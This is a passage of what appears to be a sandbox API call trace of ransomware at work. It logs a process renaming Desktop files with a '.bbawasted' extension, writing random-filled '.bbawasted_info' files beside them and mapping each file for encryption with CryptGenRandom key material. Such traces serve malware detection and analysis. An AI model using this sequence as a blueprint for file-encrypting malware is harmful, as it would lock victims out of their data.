lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4OU4lf 3X3yBR0MaJ_r.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4ou4lf 3x3ybr0maj_r.gif.bbawasted")) returned 1 [0069.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4OU4lf 3X3yBR0MaJ_r.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4ou4lf 3x3ybr0maj_r.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.617] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.617] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x183df [0069.617] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x183df) returned 0xfe0000 [0069.617] CloseHandle (hObject=0xfc) returned 1 [0069.621] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.622] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0069.622] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.622] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.623] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.623] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.631] SetEndOfFile (hFile=0x110) returned 1 [0069.634] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.634] CloseHandle (hObject=0x110) returned 1 [0069.638] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.638] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5a30 | out: hHeap=0x580000) returned 1 [0069.639] _aulldvrm () returned 0x0 [0069.639] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.639] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.639] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.639] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r3f0pu la.rtf") returned 55 [0069.639] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x278) returned 0x5bf070 [0069.639] lstrcpyW (in: lpString1=0x5bf0de, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.640] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.640] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.640] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.640] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r3f0pu la.rtf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r3f0pu la.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.719] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.720] SetEndOfFile (hFile=0xf8) returned 1 [0069.721] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.721] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.721] lstrcpyW (in: lpString1=0x5bf0de, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r3f0pu la.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r3f0pu la.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r3f0pu la.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r3f0pu la.rtf.bbawasted")) returned 1 [0069.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r3f0pu la.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r3f0pu la.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.722] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.722] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x15100 [0069.722] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15100) returned 0xfe0000 [0069.722] CloseHandle (hObject=0x110) returned 1 [0069.727] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.727] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.727] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.727] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.728] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.728] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.737] SetEndOfFile (hFile=0xf8) returned 1 [0069.739] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4f80 | out: hHeap=0x580000) returned 1 [0069.739] CloseHandle (hObject=0xf8) returned 1 [0069.741] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.741] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5b10 | out: hHeap=0x580000) returned 1 [0069.741] _aulldvrm () returned 0x0 [0069.741] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.742] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.742] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yNmwr_Bl_hXof8-AorK.mp3") returned 65 [0069.742] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5bf070 [0069.742] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.742] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4f80 [0069.742] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.743] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4f80 | out: pbBuffer=0x5c4f80) returned 1 [0069.743] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yNmwr_Bl_hXof8-AorK.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ynmwr_bl_hxof8-aork.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.744] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4f80*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4f80*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.745] SetEndOfFile (hFile=0xf8) returned 1 [0069.745] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.745] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4f80 | out: hHeap=0x580000) returned 1 [0069.745] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yNmwr_Bl_hXof8-AorK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ynmwr_bl_hxof8-aork.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yNmwr_Bl_hXof8-AorK.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ynmwr_bl_hxof8-aork.mp3.bbawasted")) returned 1 [0069.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yNmwr_Bl_hXof8-AorK.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ynmwr_bl_hxof8-aork.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.747] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0069.747] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x510a [0069.747] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510a) returned 0x570000 [0069.747] CloseHandle (hObject=0xfc) returned 1 [0069.749] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.750] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.750] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.751] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.751] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.751] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.797] SetEndOfFile (hFile=0xf8) returned 1 [0069.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4f80 | out: hHeap=0x580000) returned 1 [0069.800] CloseHandle (hObject=0xf8) returned 1 [0069.801] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.801] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c5e48 | out: hHeap=0x580000) returned 1 [0069.801] _aulldvrm () returned 0x0 [0069.801] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.802] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.802] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\M34J6Es4S_rEwcp.jpg") returned 68 [0069.802] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5bf070 [0069.802] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.802] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.802] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.803] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.803] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\M34J6Es4S_rEwcp.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\m34j6es4s_rewcp.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.804] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.805] SetEndOfFile (hFile=0xf8) returned 1 [0069.805] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.805] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.805] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\M34J6Es4S_rEwcp.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\m34j6es4s_rewcp.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\M34J6Es4S_rEwcp.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\m34j6es4s_rewcp.jpg.bbawasted")) returned 1 [0069.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\M34J6Es4S_rEwcp.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\m34j6es4s_rewcp.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.806] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.806] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x14e04 [0069.806] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14e04) returned 0xfe0000 [0069.806] CloseHandle (hObject=0x110) returned 1 [0069.810] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.811] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0069.811] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.811] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.812] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.812] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.820] SetEndOfFile (hFile=0xf8) returned 1 [0069.822] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.822] CloseHandle (hObject=0xf8) returned 1 [0069.824] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.824] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.825] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.825] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.825] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\qkz3bBYNSBlbOVxhLHSv.pptx") returned 74 [0069.825] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29e) returned 0x5bf070 [0069.825] lstrcpyW (in: lpString1=0x5bf104, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.825] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.825] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.826] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.826] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\qkz3bBYNSBlbOVxhLHSv.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\qkz3bbynsblbovxhlhsv.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.835] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.836] SetEndOfFile (hFile=0xf8) returned 1 [0069.836] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.836] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.836] lstrcpyW (in: lpString1=0x5bf104, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\qkz3bBYNSBlbOVxhLHSv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\qkz3bbynsblbovxhlhsv.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\qkz3bBYNSBlbOVxhLHSv.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\qkz3bbynsblbovxhlhsv.pptx.bbawasted")) returned 1 [0069.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\qkz3bBYNSBlbOVxhLHSv.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\qkz3bbynsblbovxhlhsv.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.838] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0069.841] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.841] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.841] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.841] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.842] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.842] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.851] SetEndOfFile (hFile=0xf8) returned 1 [0069.853] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.853] CloseHandle (hObject=0xf8) returned 1 [0069.854] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.854] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.855] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.855] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\WGYXxA.pps") returned 59 [0069.855] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5bf070 [0069.855] lstrcpyW (in: lpString1=0x5bf0e6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.855] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.855] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.856] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.856] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\WGYXxA.pps.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\wgyxxa.pps.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.856] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.857] SetEndOfFile (hFile=0xf8) returned 1 [0069.857] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.858] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.858] lstrcpyW (in: lpString1=0x5bf0e6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.858] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\WGYXxA.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\wgyxxa.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\WGYXxA.pps.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\wgyxxa.pps.bbawasted")) returned 1 [0069.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\WGYXxA.pps.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\wgyxxa.pps.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.858] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.000] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.000] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.001] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.001] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.001] CryptGenRandom (in: hProv=0x5a4020, 